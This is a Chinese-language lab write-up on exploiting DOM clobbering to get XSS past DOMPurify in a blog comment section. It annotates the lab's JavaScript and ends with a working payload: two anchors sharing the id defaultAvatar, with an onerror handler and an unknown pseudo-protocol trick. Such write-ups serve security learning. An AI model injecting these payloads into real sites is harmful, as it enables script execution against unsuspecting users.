目录
首先查看/resources/labheader/js/labHeader.js,没有什么作用
看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)
尝试一下看看可不可以XSS
首先进入一个评论区进行评论,然后尝试xss
HTML is allowd这里是用textarea标签提交,这没有办法插入
然后再下面尝试xss,无法成功
然后查看源码发现都被过滤了
DOM破坏
查看源码确定DOM破坏漏洞点以及代码分析
DOM破坏肯定是要看js的我们打开源码查看一下,发现了如下图的代码
首先查看/resources/labheader/js/labHeader.js,没有什么作用
completedListeners = [];
(function () {
let labHeaderWebSocket = undefined;
function openWebSocket() {
return new Promise(res => {
if (labHeaderWebSocket) {
res(labHeaderWebSocket);
return;
}
let newWebSocket = new WebSocket(location.origin.replace("http", "ws") + "/academyLabHeader");
newWebSocket.onopen = function (evt) {
res(newWebSocket);
};
newWebSocket.onmessage = function (evt) {
const labSolved = document.getElementById('notification-labsolved');
const keepAliveMsg = evt.data === 'PONG';
if (labSolved || keepAliveMsg) {
return;
}
document.getElementById("academyLabHeader").innerHTML = evt.data;
animateLabHeader();
for (const listener of completedListeners) {
listener();
}
};
setInterval(() => {
newWebSocket.send("PING");
}, 5000)
});
}
labHeaderWebSocket = openWebSocket();
})();
function animateLabHeader() {
setTimeout(function() {
const labSolved = document.getElementById('notification-labsolved');
if (labSolved)
{
let cl = labSolved.classList;
cl.remove('notification-labsolved-hidden');
cl.add('notification-labsolved');
}
}, 500);
}
然后domPurify这东西是一个过滤框架也没啥子用
看/resources/js/loadCommentsWithDomClobbering.js尝试分析代码(对于代码的分析在注释中)
function loadComments(postCommentPath) {
let xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
let comments = JSON.parse(this.responseText);
displayComments(comments);
}
};
xhr.open("GET", postCommentPath + window.location.search);
xhr.send();
// 创建一个新的 XMLHttpRequest 对象 xhr。
// 设置 onreadystatechange 事件处理函数,检查请求的状态(readyState 为 4 表示请求完成,status 为 200 表示请求成功)
//在请求完成后,将解析后的评论数据传递给 displayComments 函数
// 使用 GET 方法发起请求,URL 由 postCommentPath 和当前页面的查询参数组成(window.location.search)
function escapeHTML(data) {
return data.replace(/[<>'"]/g, function(c){
return '&#' + c.charCodeAt(0) + ';';
})
}
//对输入内容进行实体编码,让其无法进入标签开始状态
function displayComments(comments) {
let userComments = document.getElementById("user-comments");
//获取id,用于显示评论
for (let i = 0; i < comments.length; ++i)
{
comment = comments[i];
let commentSection = document.createElement("section");
commentSection.setAttribute("class", "comment");
let firstPElement = document.createElement("p");
//遍历 comments 数组中的每个评论对象。
// 为每个评论创建一个新的 <section> 元素,并设置其 class 属性为 "comment"。
// 创建一个新的 <p> 元素,用于显示评论的作者、日期和头像。
let defaultAvatar = window.defaultAvatar || {avatar: '/resources/images/avatarDefault.svg'}
let avatarImgHTML = '<img class="avatar" src="' + (comment.avatar ? escapeHTML(comment.avatar) : defaultAvatar.avatar) + '">';
let divImgContainer = document.createElement("div");
divImgContainer.innerHTML = avatarImgHTML
// 使用 defaultAvatar 对象提供一个默认头像(如果 window.defaultAvatar 不存在,则使用默认路径)
// 创建一个包含头像 <img> 标签的 HTML 字符串,并设置头像的 src 属性,如果 comment.avatar存在,它会将 comment.avatar 经过 escapeHTML 函数处理后作为头像URL。如果 comment.avatar 不存在,则使用 defaultAvatar.avatar 作为默认头像URL
// 将头像的 HTML 插入到一个新的 <div> 元素中
if (comment.author) {
if (comment.website) {
let websiteElement = document.createElement("a");
websiteElement.setAttribute("id", "author");
websiteElement.setAttribute("href", comment.website);
firstPElement.appendChild(websiteElement)
}
let newInnerHtml = firstPElement.innerHTML + DOMPurify.sanitize(comment.author)
firstPElement.innerHTML = newInnerHtml
}
if (comment.date) {
let dateObj = new Date(comment.date)
let month = '' + (dateObj.getMonth() + 1);
let day = '' + dateObj.getDate();
let year = dateObj.getFullYear();
if (month.length < 2)
month = '0' + month;
if (day.length < 2)
day = '0' + day;
dateStr = [day, month, year].join('-');
let newInnerHtml = firstPElement.innerHTML + " | " + dateStr
firstPElement.innerHTML = newInnerHtml
}
firstPElement.appendChild(divImgContainer);
commentSection.appendChild(firstPElement);
if (comment.body) {
let commentBodyPElement = document.createElement("p");
commentBodyPElement.innerHTML = DOMPurify.sanitize(comment.body);
commentSection.appendChild(commentBodyPElement);
}
commentSection.appendChild(document.createElement("p"));
userComments.appendChild(commentSection);
//如果评论对象中有 body,则创建一个新的 <p> 元素来显示评论内容,并使用 DOMPurify.sanitize 进行清理。
//将清理后的评论内容 <p> 元素添加到评论部分。
//还会在每个评论后添加一个空的 <p> 元素(可能是为了间距)。
//最后,将创建的评论部分添加到 userComments 元素中。
}
}
};
然后我们的注入点在这里,这里非常可疑
我们开始是没有头像的所以我们开始会走到window.defaultAvatar上,所以只要我们想办法构造一个 defaultAvatar.avatar就可以进行XSS了
技巧
然后我们借助一个js特性,看下面两张图id相同时不同的值的取法
然后如果是a标签的话获取属性后会将a标签的href的值进行一个toString方法传进去
具体看下面最后一道题目的解
payload构造
首先闭合下面双引号
所以下面构造的时候1后面要加双引号但是加双引号的时候会出现问题,无法闭合,我们尝试是用HTML实体编码
<a id=defaultAvatar><a id=defaultAvatar name="avatar" href="1" onerror=alert(1)//">
尝试XSS,这里还是不行,"还是会被编码
然后是用一个小技巧,是用一个不存在的伪协议,然后这个伪协议不存在,后面"就不会被编码
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="AS:" onerror=alert(1)//">
再从新输入一次评论